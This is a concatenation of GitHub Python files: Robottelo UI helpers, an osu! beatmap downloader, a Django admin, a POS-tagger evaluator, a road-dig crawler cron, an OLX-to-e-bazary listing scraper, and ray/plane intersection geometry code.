package_name,\n package_version,\n )\n )\n self.click(common_locators.kt_search_button)\n return self.wait_until_element(\n locators['contentviews.version.package_name'] % package_name)\n\n def fetch_version_packages(self, name, version_name):\n \"\"\"Return a list of all the packages inside specific content view\n version\"\"\"\n self.click(self.version_search(name, version_name))\n packages_tab_is_not_visible = self.wait_until_element_is_not_visible(\n tab_locators['contentviews.tab_version_packages'], timeout=3)\n packages = []\n if packages_tab_is_not_visible:\n return packages\n self.click(tab_locators['contentviews.tab_version_packages'])\n while True:\n names = self.find_elements(\n locators['contentviews.version.package_name'] % '')\n versions = self.find_elements(\n locators['contentviews.version.package_version'] % '')\n releases = self.find_elements(\n locators['contentviews.version.package_release'] % '')\n archs = self.find_elements(\n locators['contentviews.version.package_arch'] % '')\n for name, version, release, arch in zip(\n names, versions, releases, archs):\n packages.append(\n (name.text, version.text, release.text, arch.text))\n next_ = self.find_element(\n locators['contentviews.version.content_next_page'])\n if next_ is None:\n break\n self.click(next_)\n return packages\n\n def fetch_version_errata(self, name, version_name):\n \"\"\"Return a list of all the errata inside specific content view\n version\"\"\"\n self.click(self.version_search(name, version_name))\n errata_tab_is_not_visible = self.wait_until_element_is_not_visible(\n tab_locators['contentviews.tab_version_errata'], timeout=5)\n errata = []\n if errata_tab_is_not_visible:\n return errata\n self.click(tab_locators['contentviews.tab_version_errata'])\n while True:\n ids = self.find_elements(\n locators['contentviews.version.errata_id'] % '')\n titles = self.find_elements(\n locators['contentviews.version.errata_title'] % '')\n types = self.find_elements(\n locators['contentviews.version.errata_type'] % '')\n for id_, title, type_ in zip(ids, titles, types):\n errata.append((id_.text, title.text, type_.text))\n next_ = self.find_element(\n locators['contentviews.version.content_next_page'])\n if next_ is None:\n break\n self.click(next_)\n return errata\n\n def puppet_module_search(self, name, version, module_name):\n \"\"\"Search for puppet module element in content view version\"\"\"\n self.click(self.version_search(name, version))\n self.click(tab_locators.contentviews.tab_version_puppet_modules)\n self.assign_value(\n common_locators.kt_search,\n module_name\n )\n self.click(common_locators.kt_search_button)\n return self.wait_until_element(\n locators.contentviews.version.puppet_module_name % module_name)\n\n def remove_version_from_environments(self, name, version, environments):\n \"\"\"Remove a content view version from lifecycle environments\"\"\"\n # find and open the content view\n self.search_and_click(name)\n # click on the version remove button\n self.click(locators['contentviews.version_dropdown'] % version)\n self.click(locators.contentviews.remove_ver % version)\n # ensure, that remove Completely remove version check box is unchecked\n self.assign_value(\n locators.contentviews.completely_remove_checkbox,\n False\n )\n # get all the available lifecycle environments\n all_environments_elements = self.find_elements(\n locators.contentviews.delete_version_environments)\n all_environments = [\n env_element.text\n for env_element in all_environments_elements\n ]\n # select the needed ones that are in the environments arg\n # and unselected the ones not in environments arg\n for environment in all_environments:\n self.assign_value(\n (locators.contentviews.delete_version_environment_checkbox\n % environment),\n environment in environments\n )\n self.click(locators.contentviews.next_button)\n self.click(locators.contentviews.confirm_remove_ver)\n self.check_progress_bar_status(version)\n\n def get_cv_table_value(self, cv_name, column_name):\n \"\"\"Get value for specific table cell\n\n :param str cv_name: Name of content view to be fetched\n :param str column_name: Name of table column that needs to be fetched\n :return str: Cell value text\n \"\"\"\n element = self.search(cv_name)\n if element is None:\n raise UINoSuchElementError(\n 'Unable to find necessary cv \"{0}\".'.format(cv_name)\n )\n return self.wait_until_element(\n common_locators['kt_table_cell_value'] % (cv_name, column_name)\n ).text\n","repo_name":"sghai/robottelo","sub_path":"robottelo/ui/contentviews.py","file_name":"contentviews.py","file_ext":"py","file_size_in_byte":37189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"22317722499","text":"import json\nimport requests\nimport os\nimport string\nimport unicodedata\n\nvalidFilenameChars = \"-_.() %s%s\" % (string.ascii_letters, string.digits)\ndef removeDisallowedFilenameChars(filename):\n cleanedFilename = unicodedata.normalize('NFKD', filename).encode('ASCII', 'ignore')\n return ''.join(chr(c) for c in cleanedFilename if chr(c) in validFilenameChars)\n\nuser_id = int(input('Enter User ID from profile URL: '))\nnumber_of_maps = int(input('Enter top number of maps to download: '))\nosu_session_cookie = str(input('Enter osu session token, instructions in github readme: '))\n\nr = requests.get(f'https://osu.ppy.sh/users/{user_id}/beatmapsets/most_played?offset=0&limit={number_of_maps}')\ndata = r.json()\n\ntry:\n os.makedirs(\"./songs\")\nexcept FileExistsError:\n pass\n\nfor beatmap in data:\n beatmap_id = beatmap['beatmapset']['id']\n beatmap_title = removeDisallowedFilenameChars(str(beatmap['beatmapset']['title']))\n download_url = f\"https://osu.ppy.sh/beatmapsets/{beatmap_id}/download?noVideo=1\"\n \n print(f'\\n-------{beatmap_id}-------')\n print(download_url)\n print('Downloading beatmap: ' + str(beatmap_title))\n \n cookies = {'osu_session': osu_session_cookie}\n r = requests.get(download_url, cookies=cookies)\n\n with open(f'./songs/{beatmap_title}.osz', 'wb') as f: \n f.write(r.content)\n\n ","repo_name":"tomhepz/Osu-Most-Played-Downloader","sub_path":"OSUDownloader.py","file_name":"OSUDownloader.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"5249153501","text":"import decimal\nfrom django.contrib import admin\n\n\n# Register your models here.\nfrom .models import MyProduct\nfrom .models import Administrator\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.template.loader import get_template\nfrom django.core.mail import EmailMultiAlternatives\n\n#Function to send the mails to Admins when admins modifies a product\ndef send_email(mail,prod):\n context = {prod}\n template = get_template('email.html')\n content = template.render(context)\n email = EmailMultiAlternatives(\n 'Product Notification',\n 'Other admin modified a product',\n settings.EMAIL_HOST_USER,\n [mail]\n )\n \n email.attach_alternative(content, 'text/html')\n\n#Check if the request on products is POST to send notifications\ndef products(self,request):\n if request.method == 'POST':\n mail = MyAdministrator.get_queryset\n prod = self.name\n send_email(mail)\n return render(request, 'admin/products')\n\n#Add to wish list action, can you see at history of the products who user wished\ndef wishProducts(self,request, queryset):\n for myproduct in queryset:\n myproduct.wished = myproduct.wished + 1\n myproduct.save()\n self.message_user(request, \"Added at your wished list.\")\nwishProducts.short_description = 'I wished this'\n\nclass MyProductAdmin(admin.ModelAdmin):\n actions = [wishProducts, ] # <-- Add one extra list action function here to do a disccount\n list_display = ['name', 'prize']\n \n#Register our classes in admin\nadmin.site.register(MyProduct,MyProductAdmin)\n \n \n\n","repo_name":"KarenC7/ManageProduct","sub_path":"product/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29704788075","text":"import os\nimport numpy as np\nimport itertools\nfrom matplotlib import pyplot as plt\n\n\nclass Confusion:\n def __init__(self, tag_map):\n self.tag_map_len = len(tag_map)\n self.conf_matrix = np.zeros((self.tag_map_len, self.tag_map_len))\n tag_id_map = {k: v for v, k in tag_map.items()}\n label_name = []\n for i in range(len(tag_id_map)):\n label_name.append(tag_id_map[i])\n self.label_name = label_name\n\n def confusion_matrix(self, ground_truth, prediction):\n for g, p in zip(ground_truth, prediction):\n self.conf_matrix[g, p] += 1\n return self.conf_matrix\n\n def plot_confusion_matrix(self, normalize=False, title='Confusion matrix', color_map=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n Input\n - normalize : True: display the percent, False: display the count\n \"\"\"\n if normalize:\n cm = np.asarray(self.conf_matrix, dtype=np.float)\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n else:\n cm = np.asarray(self.conf_matrix, dtype=np.int32)\n\n plt.figure(figsize=(30, 10))\n plt.imshow(cm, interpolation='nearest', cmap=color_map)\n plt.title(title, size=10)\n plt.colorbar()\n tick_marks = np.arange(len(self.label_name))\n plt.xticks(tick_marks, self.label_name, rotation=90, size=6)\n plt.yticks(tick_marks, self.label_name, size=6)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", size=7, color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.xlabel('Ground Truth', size=8)\n plt.ylabel('Predictions', size=8)\n\n plt.show()\n\n\ndef evaluation(output_file, ref_file, tag_map):\n confusion = Confusion(tag_map)\n\n with open(output_file) as output:\n out_lines = output.readlines()\n\n with open(ref_file) as reference:\n ref_lines = reference.readlines()\n\n if len(out_lines) != len(ref_lines):\n print('Error: No. of lines in output file and reference file do not match.')\n exit(0)\n\n total_tags = 0\n matched_tags = 0\n for i in range(0, len(out_lines)):\n out_line = out_lines[i].strip()\n out_tags = out_line.split(' ')\n ref_line = ref_lines[i].strip()\n ref_tags = ref_line.split(' ')\n total_tags += len(ref_tags)\n\n for j in range(0, len(ref_tags)):\n if out_tags[j] == ref_tags[j]:\n matched_tags += 1\n out_tag = out_tags[j].split('/')\n ref_tag = ref_tags[j].split('/')\n\n out_tag_id = tag_map[out_tag[len(out_tag)-1]]\n ref_tag_id = tag_map[ref_tag[len(ref_tag)-1]]\n confusion.conf_matrix[ref_tag_id][out_tag_id] += 1\n print(\"Accuracy={}%\".format(\"%.6f\" % ((float(matched_tags) / total_tags)*100)))\n confusion.plot_confusion_matrix()\n\n\nif __name__ == \"__main__\":\n Curr_Path = os.getcwd()\n Tag_map = {'CC': 0, 'CD': 1, 'DT': 2, 'EX': 3, 'FW': 4, 'IN': 5, 'JJ': 6, 'JJR': 7, 'JJS': 8, 'LS': 9,\n 'MD': 10, 'NN': 11, 'NNP': 12, 'NNPS': 13, 'NNS': 14, 'PDT': 15, 'POS': 16, 'PRP': 17, 'PRP$': 18, 'RB': 19,\n 'RBR': 20, 'RBS': 21, 'RP': 22, 'SYM': 23, 'TO': 24, 'UH': 25, 'VB': 26, 'VBD': 27, 'VBG': 28, 'VBN': 29,\n 'VBP': 30, 'VBZ': 31, 'WDT': 32, 'WP': 33, 'WP$': 34, 'WRB': 35, '#': 36, '$': 37, \"''\": 38, '-LRB-': 39,\n '-RRB-': 40, ', ': 41, '.': 42, ':': 43, '``': 44, ',': 45}\n\n Data_Path = os.path.join(os.path.abspath(os.path.dirname(Curr_Path)), \"data\")\n Output_File = os.path.join(Data_Path, \"sents.output_hmm\")\n Ref_File = os.path.join(Data_Path, \"sents.answer\")\n evaluation(Output_File, Ref_File, Tag_map)\n\n\n","repo_name":"Scott-Lu/cs5340_project","sub_path":"hmm/hmm/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11868151279","text":"# -*- coding: utf-8 -*-\n\nfrom app.constants import S_OK, S_ERR\nimport random\nimport math\nimport base64\nimport time\nimport ujson as json\nimport argparse\n\nfrom app.constants import *\nfrom app import cfg\nfrom app import util\n\nfrom app import cron\nfrom app.crawlers.new_taipei_city import crawler_new_taipei_city_dig_point\n\ndef cron_new_taipei_city_dig_point():\n params = {}\n while True:\n (error_code, params) = _get_params(params)\n\n cfg.logger.debug('error_code: %s params: %s', error_code, params)\n\n if error_code != S_OK:\n break\n\n results = crawler_new_taipei_city_dig_point.crawler_new_taipei_city_dig_point(params)\n\n _process_results(results)\n\n\ndef _get_params(params):\n if not params:\n server = cfg.config.get('web_server', 'http://106.187.101.193:5346')\n the_url = server + '/get/new_taipei_city_dig_point_next_year'\n http_result = util.http_multiget([the_url])\n\n next_year = util._int(util.json_loads(http_result.get(the_url, ''), ''), START_NEW_TAIPEI_CITY_DIG_POINT_YEAR)\n this_year = _get_this_year()\n\n next_year = min(next_year, this_year)\n\n cfg.logger.debug('after http_multiget: http_result: %s next_year: %s', http_result, next_year)\n\n return (S_OK, {'next_year': next_year})\n\n next_year = params.get('next_year', START_NEW_TAIPEI_CITY_DIG_POINT_YEAR)\n stop_year = _get_stop_year()\n\n if next_year == stop_year:\n return (S_ERR, {'next_year': next_year})\n\n next_year += 1\n\n return (S_OK, {'next_year': next_year})\n\n\ndef _get_this_year():\n the_datetime = util.get_datetime()\n\n return the_datetime.year\n\n\ndef _get_stop_year():\n return _get_this_year() + 1\n\n\ndef _process_results(results):\n data = results.get('data', [])\n cron.to_http_post(data)\n\n util.to_json(data, 'log.new_taipei_city_dig_point.json')\n\n\ndef parse_args():\n ''' '''\n parser = argparse.ArgumentParser(description='roadpin_backend')\n parser.add_argument('-i', '--ini', type=str, required=True, help=\"ini filename\")\n\n args = parser.parse_args()\n\n return (S_OK, args)\n\n\nif __name__ == '__main__':\n (error_code, args) = parse_args()\n\n cfg.init({\"ini_filename\": args.ini})\n\n cron_new_taipei_city_dig_point()\n","repo_name":"g0v/roadpin","sub_path":"roadpin_crawlers/app/cron/new_taipei_city/cron_new_taipei_city_dig_point.py","file_name":"cron_new_taipei_city_dig_point.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"9927789632","text":"\nimport os\nimport sys\nimport uuid\n\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport random\n\nimport urllib.parse\n\nimport base64\nimport requests\n\nfrom PIL import Image\nfrom io import BytesIO\nimport time\n\n\n\ndef randFloat (mi, mx):\n base = random.randrange(9999, 999999) / random.randrange(1, 99)\n return base % (mx - mi) + mi\n\ndef get_as_base64(url):\n return base64.b64encode(requests.get(url).content)\n\ndef scrap_upload_and_link_images (http, imgs, offerId):\n totalCount = 0\n\n for img in imgs:\n # convert to base64\n # generate new UUID\n # upload\n # link\n\n if totalCount >= 5:\n break\n\n print(f'processing: {img}')\n imageId = str(uuid.uuid1())\n\n # get PIL image\n response = requests.get(img)\n pimg = None\n\n try:\n pimg = Image.open(BytesIO(response.content))\n except:\n continue\n\n # convert to base64\n\n buffered = BytesIO()\n \n # now resize, and do it smart\n W, H = pimg.size\n newSize = (0, 0)\n\n if W > H:\n newSize = (512, H * 512 // W)\n elif W == H:\n newSize = (512, 512)\n else:\n newSize = (W * 512 // H, 512)\n\n pimg = pimg.resize(newSize)\n pimg.save(buffered, format=\"JPEG\", quality=25, subsampling=4)\n b64 = base64.b64encode(buffered.getvalue())\n simg = f'data:image/jpeg;base64,{urllib.parse.quote_plus(b64)}'\n # print(f'{simg}') #TODO, MIGHT NEED WRAPR\n\n # now chunk it, and send throught\n\n packets = []\n for i in range(0, len(simg), 1980):\n packets.append(simg[i: i + 1980])\n\n packetId = 0\n for p in packets:\n url = f'http://e-bazary.ugu.pl/uploadImage.php?imageId={imageId}&packetId={packetId}&content={p}'\n r = requests.get(url)\n print(f'\\n{imageId} {packetId} resp = {r}')\n # print(f'url = {url}')\n # time.sleep(0.1)\n packetId = packetId + 1\n\n # subscribe image to offer\n requests.get(f'http://e-bazary.ugu.pl/addImageToOffer.php?offerId={offerId}&imageId={imageId}')\n totalCount = totalCount + 1\n\n\ndef scrap_from_link (http, link, kind):\n print(f'Scrapping from {link}')\n\n response = http.request('GET', f'https://www.olx.pl{link}')\n soup = BeautifulSoup(response.data)\n\n imgs = soup.find_all(\"img\", {\"class\": \"css-1bmvjcs\"})\n srcs = []\n\n # First, Pool Images\n\n for img in imgs:\n src = img.get('src')\n srcset = img.get('srcset')\n datasrc = img.get('data-src')\n\n if src is not None:\n srcs.append(src)\n\n if srcset is not None:\n srcs.append(srcset)\n\n if datasrc is not None:\n srcs.append(datasrc)\n\n srcs = list(dict.fromkeys(srcs))\n # print(f\"\\tfound images: {srcs}\")\n\n # Second, Pool Data\n titleHT = soup.find_all(\"h1\", {\"class\": \"css-r9zjja-Text\"})\n title = titleHT[0].string\n title = urllib.parse.quote_plus(title)\n\n descrHT = soup.find_all(\"div\", {\"class\": \"css-g5mtbi-Text\"})\n descr = descrHT[0].contents[0]\n descr = urllib.parse.quote_plus(descr)\n\n priceHT = soup.find_all(\"h3\", {\"class\": \"css-okktvh-Text\"})\n price = priceHT[0].contents[0]\n price = str(price).replace(' ', '')\n\n lat = randFloat(50.729088712331226, 53.936303826804135)\n lon = randFloat(15.678710715966309, 23.45703077399104)\n offerId = str(uuid.uuid1())\n userId = random.randrange(1, 100)\n\n print(f'offerId: {offerId}, Title: {title}, Descr: {descr}, Price {price}, Lat: {lat}, Lon: {lon}')\n\n #send info to server\n r2 = http.request('GET', f'http://e-bazary.ugu.pl/newOffer.php?userId={userId}&offerId={offerId}&kind={kind}&title={title}&descr={descr}&price={price}&lat={lat}&lon={lon}')\n \n # Now, Attempt to add images to this offer\n scrap_upload_and_link_images(http, srcs, offerId)\n\n\ndef scrape_from_search (http, info):\n print(f'Pooling {info[0]} from {info[1]}')\n # url = 'http://www.thefamouspeople.com/singers.php'\n \n response = http.request('GET', info[1])\n soup = BeautifulSoup(response.data)\n\n # now pool links to offers\n # but how?\n linx = soup.find_all(\"a\", {\"class\": \"css-rc5s2u\"})\n hrefs = []\n\n for link in linx:\n # now get is href\n # print(f'\\tfound: {link[\"href\"]}')\n hrefs.append(link['href'])\n\n for href in hrefs:\n scrap_from_link(http, href, info[0])\n\n\n\ndef main():\n print('began scraping!')\n\n http = urllib3.PoolManager()\n\n pages = []\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/telefony/'))\n pages.append(('Moda', 'https://www.olx.pl/d/moda/ubrania-meskie/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Dom', 'https://www.olx.pl/d/dom-ogrod/wykonczenie-wnetrz/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/komputery/'))\n pages.append(('Inne', 'https://www.olx.pl/d/uslugi-firmy/uslugi/'))\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/smartwatche-i-opaski/'))\n pages.append(('Dom', 'https://www.olx.pl/d/dom-ogrod/meble/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/gry-konsole/'))\n pages.append(('Motoryzacja', 'https://www.olx.pl/d/motoryzacja/samochody/'))\n pages.append(('Moda', 'https://www.olx.pl/d/moda/ubrania-damskie/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Motoryzacja', 'https://www.olx.pl/d/motoryzacja/motocykle-skutery/'))\n\n # url = 'http://e-bazary.ugu.pl/dbgImg.php'\n # response = http.request('GET', url)\n\n # print(f'contents:\\n\"{response.data}\"\\n')\n\n for inf in pages:\n scrape_from_search(http, inf)\n\n\nif __name__ == '__main__':\n main()","repo_name":"quakcin/eBazary","sub_path":"webScraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1791193470","text":"import argparse\nfrom distutils.log import error\nimport os\nimport numpy as np\nfrom PIL import Image\n\nerror_bound = 1e-10 # error bound for computational instability in numpy\n\ncross = lambda x,y:np.cross(x.T,y.T).T # This is for bug resolution in numpy with pylance (related with type checking)\n # input : two n × 1 vector\n # output : n × 1 vector\n\ndef compute_ray_direction(R, K, h, w):\n # output : 3 × 1 vector\n raydir = R.T @ np.linalg.inv(K) @ np.array([w, h, 1]).reshape(-1,1)\n if np.sum(np.abs(raydir)) <= 3 * error_bound:\n # ray directions must not be zero vector\n raise Exception(\"ray direction cannot be zero. Something wrong\")\n return raydir\n\ndef dot_product_unit(a, b):\n # input : two n × 1 vector\n # output : 1 × 1 vector\n norm_a = np.linalg.norm(a)\n norm_b = np.linalg.norm(b)\n if norm_a <= error_bound or norm_b <= error_bound:\n return np.zeros((1,1))\n return np.dot((a/norm_a).T,(b/norm_b))\n\ndef check_parallel(r1, r2):\n # input : two n × 1 vector\n # output : r1 // r2 ?\n # Assumption(general) : The zero vector is parallel to all vectors\n n = r1.shape[0]\n ratio = None\n\n # First, check zero vectors\n if np.sum(np.abs(r1)) <= n * error_bound or np.sum(np.abs(r2)) <= n * error_bound:\n return True\n\n # Next, consider non-zero r1\n for i in range(n):\n if np.abs(r1[i]) <= error_bound:\n # if r1 // r2, r1[i] = 0 => r2[i] = 0 \n if np.abs(r2[i]) > error_bound:\n return False\n else:\n if ratio is None:\n ratio = r2[i] / r1[i]\n else:\n if np.abs(ratio - (r2[i] / r1[i])) > error_bound:\n return False\n return True\n\ndef get_point_of_intersection_between_two_lines(c1, r1, c2, r2):\n # Let consider c1 + λ1 * r1 = c2 + λ2 * r2\n # output : λ1, λ2\n\n # c1 + λ1 * r1 = c2 + λ2 * r2\n # <=> λ1 * r1 = c2 - c1 + λ2 * r2\n # λ2 * r2 = c1 - c2 + λ1 * r1\n # <=> λ1 * (r1 × r2) = (c2 - c1) × r2\n # λ2 * (r2 × r1) = (c1 - c2) × r1\n # <=> λ1 = dot((c2 - c1) × r2, (r1 × r2)) / ||(r1 × r2)||^2\n # λ2 = dot((c1 - c2) × r1, (r2 × r1)) / ||(r1 × r2)||^2\n # If two lines are skew, c1 + λ1 * r1 and c2 + λ2 * r2 each represent the closest point to the other line\n cross_norm = np.linalg.norm(cross(r1, r2))\n if cross_norm <= error_bound:\n # It means two lines are parallel or same\n return None, None\n lam1 = np.dot(cross(c2 - c1, r2).T, cross(r1, r2)) / np.square(cross_norm)\n lam2 = np.dot(cross(c1 - c2, r1).T, cross(r2, r1)) / np.square(cross_norm)\n return lam1, lam2\n\ndef make_infinite_point_of_ray(r):\n # input : n × 1 vector (direction)\n # output : n × 1 vector (point)\n inf_point = np.zeros(r.shape)\n r_sign = np.sign(r)\n r_inf = np.full(r.shape, np.inf)\n n = r.shape[0]\n \n for i in range(n):\n if np.abs(r[i]) <= error_bound:\n inf_point[i] = 0.0\n else:\n inf_point[i] = r_sign[i] * r_inf[i]\n return inf_point\n\ndef get_intersection_line_of_two_planes(c_b, n_b, c_t, n_t):\n # input : centers and normal vectors\n # output : starting point p, direction r\n\n # Check if two planes are same or parallel\n if check_parallel(n_b, n_t):\n return None, None\n \n # Now, the intersection line must exist\n # This line is parallel with n_t × n_b\n r = cross(n_t, n_b)\n \n # Then, we should get starting point p\n # p is on both planes\n # dot(n_t, p - c_t) = 0, dot(n_b, p - c_b) = 0 => dot(n_t, p) = dot(n_t, c_t), dot(n_b, p) = dot(n_b, c_b)\n # We know that r is not zero vector. Thus, there exits i s.t. ri ≠ 0, i = x, y, z\n # Assume that rx ≠ 0. Then, A = (n_ty n_tz) is invertible\n # (n_by n_bz)\n # Thus, (py, pz).T = A^-1 @ [dot(n_t, c_t), dot(n_b, c_b)].T where px = 0\n n = r.shape[0]\n p = np.zeros((n,1))\n for i in range(n):\n if np.abs(r[i]) <= error_bound:\n continue\n p[i] = 0\n A = np.vstack([np.vstack([n_t[0:i], n_t[i+1:]]).T, np.vstack([n_b[0:i], n_b[i+1:]]).T])\n B = np.array([np.dot(n_t.T, c_t), np.dot(n_b.T, c_b)]).reshape(2,1)\n p[(i+1)%3], p[(i+2)%3] = np.linalg.inv(A) @ B\n break\n \n return p, r\n\ndef get_intersection_of_two_planes(raydirs_base, raydirs_t, c_base, c_t):\n r_b1, r_b2 = raydirs_base\n r_t1, r_t2 = raydirs_t\n c_b = c_base\n intersection_list = []\n\n # We compute intersection of two planes(one of the base planes and one of the target planes) in this function\n # If we consider infinite points, we can represent intersection of two planes as at most two points\n # First, we can get the equation of two planes by using each center and ray directions\n # dot(n_t, (x,y,z) - c_t) = 0, dot(n_b, (x,y,z) - c_b) = 0 where n_t = r_t1 × r_t2, n_b = r_b1 × r_b2\n n_t = cross(r_t1, r_t2)\n n_b = cross(r_b1, r_b2)\n\n # Next, we obtain the intersection of two planes taking into account the relationship between the two planes\n # 1) n_t not // n_b\n # 2) n_t // n_b\n # 2-1) base plane = target plane\n # 2-2) base plane ≠ target plane\n if check_parallel(n_t, n_b):\n # 2)\n # Now, check whether c_t is on base plane\n if np.abs(np.dot(n_b.T, c_t - c_b)) <= error_bound:\n # 2-1)\n # Now we consider follows\n # 2-1-1) Check if each center is in both planes\n # 2-1-2) Check if each ray is in both planes\n # 2-1-3) Obtain intersection of each two lines\n # i) Check if two lines are parallel\n # ii) Check if λ >= 0\n # We only consider 2-1-3) now because the others are considered in `Is_point_in_ray_view` or `Is_ray_in_ray_view`\n for r_b in raydirs_base:\n for r_t in raydirs_t:\n lam1, lam2 = get_point_of_intersection_between_two_lines(c_b, r_b, c_t, r_t)\n # check computational stability\n if (lam1 is not None) and (lam1 >= -error_bound) and (lam2 is not None) and (lam2 >= -error_bound):\n inter_point_b = c_b + lam1 * r_b\n inter_point_t = c_t + lam2 * r_t\n if np.linalg.norm(inter_point_b - inter_point_t) <= error_bound:\n intersection_list.append(inter_point_b.copy())\n #else:\n # raise Exception(\"computational stability is not good\")\n else:\n # 2-2)\n # There is no intersection\n return intersection_list\n else:\n # 1)\n # Now, let consider intersection line of the two planes(It must exist)\n p, r = get_intersection_line_of_two_planes(c_b, n_b, c_t, n_t) # p, r are not None\n\n # We check the following for each plane\n # i) intersection of above line and two rays\n # ii) if each infinite point of above line is in the rays' plane? \n base_intersection = []\n target_intersection = []\n\n # i)\n for r_b in raydirs_base:\n lam1, lam2 = get_point_of_intersection_between_two_lines(p, r, c_b, r_b)\n # check λ2 >= 0\n # We don't have to consider the case where r and r_b are on the same line. This case has already been considered in `Is_point_in_ray_view` or `Is_ray_in_ray_view`\n if (lam1 is not None) and (lam2 is not None) and (lam2 >= -error_bound):\n # check computational stability\n inter_point = p + lam1 * r\n inter_point_b = c_b + lam2 * r_b\n if len(base_intersection) > 0:\n if np.linalg.norm(c_base - inter_point) <= error_bound:\n break\n base_intersection.append(inter_point.copy())\n '''\n if np.linalg.norm(inter_point_b - inter_point) <= error_bound:\n # if the intersection point is already computed, (i.e. intersection point is camera center) just skip\n if len(base_intersection) > 0:\n if np.linalg.norm(c_base - inter_point) <= error_bound:\n break\n base_intersection.append(inter_point.copy())\n '''\n #else:\n # raise Exception(\"computational stability is not good\")\n # ii)\n # Two infinite points : p + λ * r, where λ' = inf or -inf\n # At most one of the two infinite points is on the rays' plane\n # The following conditions should be satisfied\n # 1) cos(r, r1) > 0 or cos(r, r2) > 0 (because of FOV < 180 degree)\n # 2) cos(r1, r2) <= cos(r, r1) and cos(r1, r2) <= cos(r, r2)\n for r in (r, -r):\n r1_r2_cos = dot_product_unit(r_b1, r_b2)\n r_r1_cos = dot_product_unit(r, r_b1)\n r_r2_cos = dot_product_unit(r, r_b2)\n if r_r1_cos > error_bound or r_r2_cos > error_bound:\n if (r1_r2_cos <= r_r1_cos) and (r1_r2_cos <= r_r2_cos):\n inf_point = make_infinite_point_of_ray(r)\n base_intersection.append(inf_point.copy())\n \n # The same for the target ray\n for r_t in raydirs_t:\n lam1, lam2 = get_point_of_intersection_between_two_lines(p, r, c_t, r_t)\n # check λ2 >= 0\n # We don't have to consider the case where r and r_t are on the same line. This case has already been considered in `Is_point_in_ray_view` or `Is_ray_in_ray_view`\n if (lam1 is not None) and (lam2 is not None) and (lam2 >= -error_bound):\n # check computational stability\n inter_point = p + lam1 * r\n inter_point_t = c_t + lam2 * r_t\n if len(target_intersection) > 0:\n if np.linalg.norm(c_t - inter_point) <= error_bound:\n break\n target_intersection.append(inter_point.copy())\n '''\n if np.linalg.norm(inter_point_t - inter_point) <= error_bound:\n # if the intersection point is already computed, (i.e. intersection point is camera center) just skip\n if len(target_intersection) > 0:\n if np.linalg.norm(c_t - inter_point) <= error_bound:\n break\n target_intersection.append(inter_point.copy())\n '''\n #else:\n # raise Exception(\"computational stability is not good\")\n\n for r in (r, -r):\n r1_r2_cos = dot_product_unit(r_t1, r_t2)\n r_r1_cos = dot_product_unit(r, r_t1)\n r_r2_cos = dot_product_unit(r, r_t2)\n if r_r1_cos > error_bound or r_r2_cos > error_bound:\n if (r1_r2_cos <= r_r1_cos) and (r1_r2_cos <= r_r2_cos):\n inf_point = make_infinite_point_of_ray(r)\n target_intersection.append(inf_point.copy())\n\n # Now, each list has a maximum of 2 points\n assert len(base_intersection) <= 2 and len(target_intersection) <= 2\n \n # Finally, we obtain the intersection of base_intersection and target_intersection\n if len(base_intersection) == 0 or len(target_intersection) == 0:\n # There is no intersection\n return intersection_list\n\n base_intersection = np.hstack(base_intersection)\n target_intersection = np.hstack(target_intersection)\n # Sort ascending by column\n base_intersection = base_intersection[:, base_intersection[0].argsort()]\n target_intersection = target_intersection[:, target_intersection[0].argsort()]\n\n # .. -- or . -- or .. - or . - \n # Below conditions can cover infinite points \n if target_intersection[0][0] > base_intersection[0][-1] \\\n or base_intersection[0][0] > target_intersection[0][-1]:\n # There is no intersection\n return intersection_list\n\n # Now consider intersection is a point\n # -.- or .-. or . == -\n if base_intersection.shape[1] == 1:\n intersection_list.append(base_intersection[:, 0].reshape(3, 1))\n return intersection_list\n if target_intersection.shape[1] == 1:\n intersection_list.append(target_intersection[:, 0].reshape(3, 1))\n return intersection_list\n \n # Finally, consider intersectoin is a line segment or ray\n # len(base_intersection) == 2 and len(target_intersection) == 2\n # -.-. or .--. or -..- or .-.-\n all_intersection = np.hstack([base_intersection, target_intersection])\n all_intersection = all_intersection[:, all_intersection[0].argsort()]\n intersection_list.append(all_intersection[:, 1].reshape(3,1))\n intersection_list.append(all_intersection[:, 2].reshape(3,1))\n \n return intersection_list\n\ndef get_intersection_of_rays_and_bbox(bbox, raydirs, c_t):\n # bbox = xmax, ymax, zmax, xmin, ymin, zmin\n # raydirs = r1, r2\n intersection_list = []\n r1, r2 = raydirs\n\n # We can cut the 3D bbox using intersection of the masks' rays and the 3D bbox\n # It is performed according to the following algorithm:\n # 1) Find the intersection of the two rays and the bbox's faces\n # 1-1) If each 